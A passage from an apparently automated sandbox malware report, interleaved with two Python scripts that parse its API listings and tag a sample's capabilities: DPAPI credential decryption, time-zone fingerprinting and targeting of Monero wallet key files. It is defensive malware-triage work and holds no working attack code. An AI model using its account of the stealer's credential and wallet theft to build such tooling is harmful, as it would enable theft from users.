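    ({"CryptStringToBinaryA"}, "base64 decode of embedded data (T1140)"),
    ({"CryptBinaryToStringA"}, "base64 encode of collected data (T1132.001)"),
    ({"GetLocalTime"}, "local time collected for victim fingerprint (T1124)"),
    ({"GetTimeZoneInformation"}, "time zone collected for victim fingerprint (T1124)"),
]
STRING_HINTS = {"wallet.keys": "Monero wallet key file targeted"}


def parse_block(text):
    """One function's API lines -> list of call dicts; an unparsable line raises."""
    calls = []
    for line in filter(str.strip, text.splitlines()):
        m = LINE_RE.match(line)
        if not m:
            raise ValueError("unparsed API line: " + line)
        args = m.group("args")
        calls.append({"api": m.group("api"), "module": m.group("mod"), "ref": m.group("ref"),
                      "subcall": m.group("sub"), "args": [] if args is None else args.split(",")})
    return calls


def decode_flags(api, args):
    """Name the bits of api's flag argument; [] when the API or value is unknown."""
    if api not in FLAG_TABLE:
        return []
    index, names = FLAG_TABLE[api]
    if index >= len(args) or not re.fullmatch(r"[0-9A-Fa-f]+", args[index]):
        return []          # "?" or a non-numeric argument such as a path
    value = rest = int(args[index], 16)
    found = []
    for bit, name in names.items():
        if value & bit == bit:
            found.append(name)
            rest &= ~bit
    if rest:
        found.append("unknown 0x%X" % rest)
    return found


def triage(blocks):
    """Label every function block; returns one summary dict per block."""
    out = []
    for text in blocks:
        calls = parse_block(text)
        apis = {c["api"] for c in calls}
        flags = {c["api"]: decode_flags(c["api"], c["args"]) for c in calls}
        hints = sorted({h for c in calls for s, h in STRING_HINTS.items() if any(s in a for a in c["args"])})
        out.append({"first_ref": calls[0]["ref"],
                    "labels": [label for needed, label in RULES if needed <= apis],
                    "flags": {k: v for k, v in flags.items() if v},
                    "hints": hints})
    return out


if __name__ == "__main__":
    for entry in triage(REPORT_BLOCKS):
        print(entry["first_ref"], entry["labels"], entry["flags"], entry["hints"])
```

                               Running the script prints one line per function with its labels, decoded flags and string hints; the DPAPI function (00A57281) and the wallet-path function (00A686CA) stand out immediately, and the two CryptStringToBinaryA calls around LocalAlloc at 00A59AEF are the usual size-then-decode pattern. To reuse it on another report, paste that report's "APIs" sections into REPORT_BLOCKS; unrecognised line shapes raise rather than being silently dropped, so a format change in the report shows up as an error instead of a missing label.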
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0144EC28,00000000,?,00A70E10,00000000,?,00000000,00000000), ref: 00A67A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A67A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0144EC28,00000000,?,00A70E10,00000000,?,00000000,00000000,?), ref: 00A67A7D
                              • wsprintfA.USER32 ref: 00A67AB7
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: f6dfcd86ce6b51969ca028367ba0bbb793c36911ca22bc7b383477394854f064
                              • Instruction ID: 4955bb0706f9a61617eedc413ffb5697c07bf0d0935493f0f9e89ad8c6319c09
                              • Opcode Fuzzy Hash: f6dfcd86ce6b51969ca028367ba0bbb793c36911ca22bc7b383477394854f064
                              • Instruction Fuzzy Hash: 8E115EB1A45218EBEB209B54DC49FADB778FB04761F1047DAE91AA32C0D7745A40CF91
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ":/L$RSoK$c@w
                              • API String ID: 0-3352682510
                              • Opcode ID: 2755a68fdb7f262ca83064d3ec538b085464de82a68defce2ac7f66a1f3b3c71
                              • Instruction ID: ff3dc5511c9fa63a954b7ab0b004ad8b4bc4a4958fc7b4d5e344d14657f6968d
                              • Opcode Fuzzy Hash: 2755a68fdb7f262ca83064d3ec538b085464de82a68defce2ac7f66a1f3b3c71
                              • Instruction Fuzzy Hash: 38B208F350C2009FE708AE29EC8577ABBE5EF94320F16863DEAC587744EA3558058797
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .,_>$qiqu$6y
                              • API String ID: 0-2707623677
                              • Opcode ID: d56d56bb7894ea1980fe8314e05dcc86025e9fafcab92333645cd8b55fdf0640
                              • Instruction ID: a4a768214a5f06d68f1c95d8482d3688253f66594013bf117efa246c11304761
                              • Opcode Fuzzy Hash: d56d56bb7894ea1980fe8314e05dcc86025e9fafcab92333645cd8b55fdf0640
                              • Instruction Fuzzy Hash: CF723BF3A0C2109FD3046E2DEC8567ABBE9EF94720F1A463DEAC4C3744EA7558018796
                              APIs
                              • CoCreateInstance.COMBASE(00A6E118,00000000,00000001,00A6E108,00000000), ref: 00A63758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00A637B0
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 2c8d9aa9fd3c88f53260223d7167b3d24fefe12bd16332e95a347e956dcf9ef7
                              • Instruction ID: 3e1d1da9fc9488a59d1e04cd15f00365db2023586c087fba7e85c0c4ada9fd54
                              • Opcode Fuzzy Hash: 2c8d9aa9fd3c88f53260223d7167b3d24fefe12bd16332e95a347e956dcf9ef7
                              • Instruction Fuzzy Hash: 2E410771A00A28AFDB24DB58CC85BDBB7B4BB48302F4041D8E609A72D0D7716E86CF50
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00A59B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00A59BA3
                              • LocalFree.KERNEL32(?), ref: 00A59BD3
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 67384a1c97ecc82020765a6d90e2aa0e019336164284cef76ece4b4b0a67c541
                              • Instruction ID: e36a2e5d62a7f4e2d919da5557d2bfebcf89d876707d8412d72bfab9503f1acf
                              • Opcode Fuzzy Hash: 67384a1c97ecc82020765a6d90e2aa0e019336164284cef76ece4b4b0a67c541
                              • Instruction Fuzzy Hash: 0F11C9B8A00209EFDB04DF94D989AAE77B5FF88300F104599ED15AB390D770AE14CFA1
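The three "APIs" listings above (GetTimeZoneInformation + wsprintfA, CoCreateInstance + MultiByteToWideChar, and CryptUnprotectData + LocalAlloc/LocalFree) are the most useful triage data in this part of the report: the call sets say what each recovered function does regardless of the opcode hashes. The script below is an added example, not code from the Joe Sandbox report or from the analysed sample. It parses the "• Api.MODULE(args), ref: ADDR" lines exactly as the report prints them (the listing embedded in the script is copied from the entries above), groups them per function and maps each function's API set to capability tags. The tag table and the check on CryptUnprotectData's third argument (pOptionalEntropy, NULL here, so the blob is bound only to the user's DPAPI master key) are the author's own assumptions for a small triage heuristic, not Joe Sandbox's signature logic.

```python
"""Triage helper for a Joe Sandbox "APIs" function listing (added example)."""
import re

# Constructed input: the three "APIs" blocks from the report, copied verbatim.
REPORT_LISTING = """\
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0144EC28,00000000,?,00A70E10,00000000,?,00000000,00000000), ref: 00A67A63
• RtlAllocateHeap.NTDLL(00000000), ref: 00A67A6A
• GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0144EC28,00000000,?,00A70E10,00000000,?,00000000,00000000,?), ref: 00A67A7D
• wsprintfA.USER32 ref: 00A67AB7
APIs
• CoCreateInstance.COMBASE(00A6E118,00000000,00000001,00A6E108,00000000), ref: 00A63758
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00A637B0
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00A59B84
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00A59BA3
• LocalFree.KERNEL32(?), ref: 00A59BD3
"""

# "• Name.MODULE(args), ref: ADDR"; the argument list is absent for variadic
# calls such as wsprintfA, which the report prints as "Name.MODULE ref: ADDR".
API_LINE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Assumed triage table (hypothetical, not Joe Sandbox's): a tag applies when
# every listed API occurs in the same function.
CAPABILITY_RULES = {
    "DPAPI blob decryption (credential access)": {"CryptUnprotectData"},
    "time-zone string built for host profile": {"GetTimeZoneInformation", "wsprintfA"},
    "COM object instantiation": {"CoCreateInstance"},
}


def parse_listing(text):
    """Return a list of functions, each a list of dicts (api, module, args, ref).

    A new function starts at every "APIs" header; lines that are not API
    calls (other report fields) are skipped rather than treated as errors.
    """
    functions = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            functions.append([])
            continue
        m = API_LINE.match(line)
        if not m or not functions:
            continue
        args = m.group("args")
        functions[-1].append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args.split(",") if args is not None else [],
            "ref": int(m.group("ref"), 16),
        })
    return functions


def dpapi_uses_entropy(call):
    """True/False for CryptUnprotectData's pOptionalEntropy, None if unknown.

    crypt32 argument order: pDataIn, ppszDataDescr, pOptionalEntropy,
    pvReserved, pPromptStruct, dwFlags, pDataOut. The report prints "?" when
    it could not recover a value, which is reported as None rather than False.
    """
    if call["api"] != "CryptUnprotectData" or len(call["args"]) < 3:
        return None
    entropy = call["args"][2]
    if entropy == "?":
        return None
    return entropy != "00000000"


def tag_function(calls):
    """Map one function's API set to the tags whose required APIs are all present."""
    present = {c["api"] for c in calls}
    return [tag for tag, needed in CAPABILITY_RULES.items() if needed <= present]


def triage(text):
    """Tag every function in the listing, keyed by the address of its first call."""
    report = {}
    for calls in parse_listing(text):
        if not calls:
            continue
        tags = tag_function(calls)
        for c in calls:
            if c["api"] == "CryptUnprotectData" and dpapi_uses_entropy(c) is False:
                tags.append("DPAPI call without optional entropy")
        report[calls[0]["ref"]] = {"apis": [c["api"] for c in calls], "tags": tags}
    return report


if __name__ == "__main__":
    for ref, info in triage(REPORT_LISTING).items():
        print(f"{ref:08X}  {', '.join(info['apis'])}")
        for tag in info["tags"]:
            print(f"          -> {tag}")
```

Run against the full report (paste every "APIs" block into REPORT_LISTING or read it from a file) to get one line per recovered function with its tags; the rule table is the part to grow as more call sets are inspected. The argument check only reads what the report recovered at call time, so a "?" is reported as unknown, never as a finding.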
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 8Fc=$A*E>$c-
                              • API String ID: 0-833717425
                              • Opcode ID: 71e61d11cea9b821d1a9ac0e0a42c9d81e193618e86c8048fecbc930a21611de
                              • Instruction ID: 7d62953a164d2d4b3df3fa1f8bf07a3f5a51296212fd58aec8f434953cc521c8
                              • Opcode Fuzzy Hash: 71e61d11cea9b821d1a9ac0e0a42c9d81e193618e86c8048fecbc930a21611de
                              • Instruction Fuzzy Hash: FC7148F3E092049BF3449A2EDC45366B7D7EBD4320F2B853DDA88D3784ED7998058286
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $o]$.ZoV$:=~
                              • API String ID: 0-3078927803
                              • Opcode ID: e4ddd00512d2f2512db682b4c48ff91dd6b84d60599381c5babee486c68db398
                              • Instruction ID: 1cbd366371adc7e2caf971887e58877f1bd128b6985d0b118285a5cabcaa5241
                              • Opcode Fuzzy Hash: e4ddd00512d2f2512db682b4c48ff91dd6b84d60599381c5babee486c68db398
                              • Instruction Fuzzy Hash: 836128F3A182045FF304AE29DC4473AB7DAEFD4720F1A893DEAC9D3744E53958058692
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: L-{
                              • API String ID: 0-648744963
                              • Opcode ID: 9110219ca00ba845393ba512ade4c996878b937d002dba8af257dd575fe46e35
                              • Instruction ID: b791f69c8af9dc1313e39d39b0e751ba735034992b22e45432df393c8bf27d36
                              • Opcode Fuzzy Hash: 9110219ca00ba845393ba512ade4c996878b937d002dba8af257dd575fe46e35
                              • Instruction Fuzzy Hash: B282F6B3A08304AFD3006E2DDC8566AFBE9EFD4720F1A493DEAC483744E63598458797
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: syw
                              • API String ID: 0-788241261
                              • Opcode ID: 2762a8158810cf760b4e0453f95f15e08becb912e91e284016645faf8e3a9eac
                              • Instruction ID: aa09b1285d8bc81df7bdaafac4ee22f745e017103725a20efb2e4d813163495e
                              • Opcode Fuzzy Hash: 2762a8158810cf760b4e0453f95f15e08becb912e91e284016645faf8e3a9eac
                              • Instruction Fuzzy Hash: C971E4F3A083004FF704AA38EC8977A7BD2DB84320F1A453DDBC587784E9785845869A
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: '}/
                              • API String ID: 0-3090730318
                              • Opcode ID: d522a7590fb91d0a7e1c50d65f9e5df15d173aa6b461712502ed7e4e34ba41a6
                              • Instruction ID: 457e2b0d642024af25d0ec302cec8e9a7ff6c0083506fd36a1aae5870c79479b
                              • Opcode Fuzzy Hash: d522a7590fb91d0a7e1c50d65f9e5df15d173aa6b461712502ed7e4e34ba41a6
                              • Instruction Fuzzy Hash: 5B5109F36081009FE740AE3DEC8577BBBEADBD4220F268A3DE5C4C7744E63998458656
                              Memory Dump Source
